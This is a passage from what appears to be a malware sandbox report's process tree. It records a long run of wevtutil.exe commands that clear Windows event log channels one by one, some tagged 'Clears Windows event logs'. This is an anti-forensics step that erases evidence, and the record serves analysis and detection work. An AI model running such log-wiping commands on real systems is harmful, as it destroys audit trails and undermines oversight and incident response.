    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:16804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:16808
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:16840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:16820
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:16892
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:16904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:16876
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:8056
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:16952
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:16964
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:16980
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:17000
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:17016
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:17044
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:17092
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:17080
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:17308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:17112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:17200
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:17176
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:17172
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:17156
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:17140
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:17196
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:17212
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:17224
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:17240
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:17268
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:17264
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:17248
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:17252
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:16856
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:15116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:16396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:15916
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:17392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:17380
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:17364
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:17352
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:17332
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:16880
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:16900
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:17008
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:16832
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:17032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:17072
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:17312
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    - Clears Windows event logs
    PID:16320
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:17120
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:17292
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:16768
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:17288
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:6420
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:16784
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:16724
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:16748
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:15476
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    - Clears Windows event logs
    PID:16924
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:3080
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:440
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:6796
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:15400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:6320
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    - Clears Windows event logs
    PID:3628
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:3976
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    - Clears Windows event logs
    PID:3084
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    - Clears Windows event logs
    PID:6388
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:6260
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3740
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3368
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:6752
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:3452
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:6484
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:7040
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:4296
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:4288
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:4444
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:6808
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    - Clears Windows event logs
    PID:4404
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:6272
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:3512
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4984
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:9568
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:5008
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:5152
